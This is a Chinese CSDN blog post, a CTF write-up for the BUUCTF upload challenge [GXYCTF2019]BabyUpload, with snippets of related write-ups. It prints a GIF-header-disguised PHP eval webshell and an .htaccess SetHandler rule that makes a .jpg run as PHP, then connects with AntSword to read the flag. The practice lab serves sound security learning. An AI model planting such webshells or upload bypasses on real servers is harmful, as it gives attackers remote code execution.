第三十六题——[GXYCTF2019]BabyUpload

最新推荐文章于 2024-05-19 14:29:37 发布
最新推荐文章于 2024-05-19 14:29:37 发布
阅读量367 收藏 1
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/116043701
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,一个文件上传框,推测是使用一句话木马获取shell查找flag

在这里插入图片描述

第二步:上传伪装好的pass.png,发现错误

pass.png内容:
GIF89a? <script language="php">eval($_REQUEST[pass])</script>

在这里插入图片描述

第三步:将png格式修改为jpg格式上传,成功

在这里插入图片描述

第四步:上传.htaccess文件,让pass.jpg文件以php格式解析,注意修改Content-Type: image/jpeg

.htaccess内容:
<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>

第五步:使用蚁剑连接获取flag

连接地址:http://e9f56dea-cdf2-4fe5-89dc-4710a148af17.node3.buuoj.cn/upload/7710e6877fe009e1daa5fed88457fc86/pass.jpg

在这里插入图片描述

想学习安全的小白
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 602
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
Buuctf-[GXYCTF2019]BabyUpload
m0_63563528的博客
04-26 199
buuctf文件上传
[GXYCTF2019]BabyUpload-BUUTF
XiaoYeZhu_1314的博客
04-24 445
他过滤了<?,ph等。
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 593
BUUCTF的wp
upload类型目总结
limenzzz的博客
04-20 1240
你传你🐎呢
BUUCTF记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1546
点开就是源代码,直接进行代码审计
[HFCTF2020]BabyUpload
nigo134的博客
06-04 975
通过上传session文件伪造session。
BUUCTF [web专项29][GXYCTF2019]BabyUpload
yanglinchiji的博客
11-07 93
成功,再次上传 .htaccess 来修改后缀(吸取了上次文件上传的经验,成功上传的结果没有index,不需要用.user.ini)发现后缀不能带ph,那么就猜测是需要上传木马图上去,在上传一些文件来修改上传目录的指定文件后缀为php来进行执行。上传成功,我们先到上传目录下的1.jpg下看看是否执行了。已经执行了,那么我们就需要蚁剑连上去即可。那就需要抓包修改上传类型来绕过检测了。进入后还是发现是个文件上传。在根目录下即可获得flag。还是用以前总结出来的方法。
web | CTF】BUUCTF [GXYCTF2019]BabyUpload1
weixin_46301214的博客
09-05 323
通常apache和nginx都包含有 .htaccess 配置文件,可以试试这个漏洞。后来发现问在Content-Type里,只能上传 image/jpeg 类型。但是发现还是能识别到,那就说明有php的特征被识别到了。那就需要使用图片码,但没有文件包含漏洞,无法执行。所以就采用上传.htaccess配置文件来。就改用JavaScript变成php来执行。然后更改文件名为jpeg后缀,上传。某文件变成php来执行。
BUUCTF_Web解记录1
Altering_Ji的博客
07-11 2454
记录一下buu 刷网站上最近做的三道web目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
BUUCTF-[GXYCTF2019]BabyUpload
m0_61361405的博客
10-19 459
首先,这是一道文件上传的目给了GitHub的源码地址,那我就来进行代码审计。从代码中可以看出:1、网站会将上传的文件保存到相应的目录下2、网站会对后缀进行检测,不能有ph3、网站会检测上传的MIME文件类型首先这是个黑名单类型的文件上传,但是试了一下PHP、Phtml之类的都不行,所以把目光放在.htaccess和.user.ini之类的解析文件上。
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 725
1.本知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
BUUCTF---web---[GXYCTF2019]BabyUpload
最新发布
2201_75556700的博客
05-19 150
4、上传包含该内容的test.txt,之后bp抓包修改文件名为.htaccess。2、上传php提示不能上传ph后缀,直接上传正常格式的图片提示太露骨了。5、利用重放器发送修改后的内容,发现成功上传了,放行。3、这里可以利用.htaccess进行绕过。6、接下来上传一句话木马test1.jpg。8、页面没有提示是图片错误,用蚁剑链接。
[GXYCTF2019]BabyUpload
weixin_43152809的博客
11-17 3413
打开界面是一个文件上传 尝试一下 首先上传的是php文件 但是显示 后缀名不能有ph! emmm,看来是对php文件做了限制 随后习惯性上传png 返回 上传类型也太露骨了吧! emmm,随后又尝试了.htaccess和.user.ini文件都与上方显示相同 正当我一筹莫展之际 发现了目页面的网址 我突然觉得我有希望了! 随后果然发现了目的源码 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" conten
[GXYCTF2019]BabyUpload wp
m0_55185160的博客
03-21 5416
打开目是一个普通的文件上传,首先上传一个普通的一句话木马得到 发现后缀名过滤了ph,所以我们上传一个图片马 上传类型也受限制了,所以把数据类型改为image/ipeg 诶这里说明它检测的是文本的内容, ...
[GXYCTF2019]BabyUpload1 -- 目分析与详解
2302_79800344的博客
03-03 1510
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值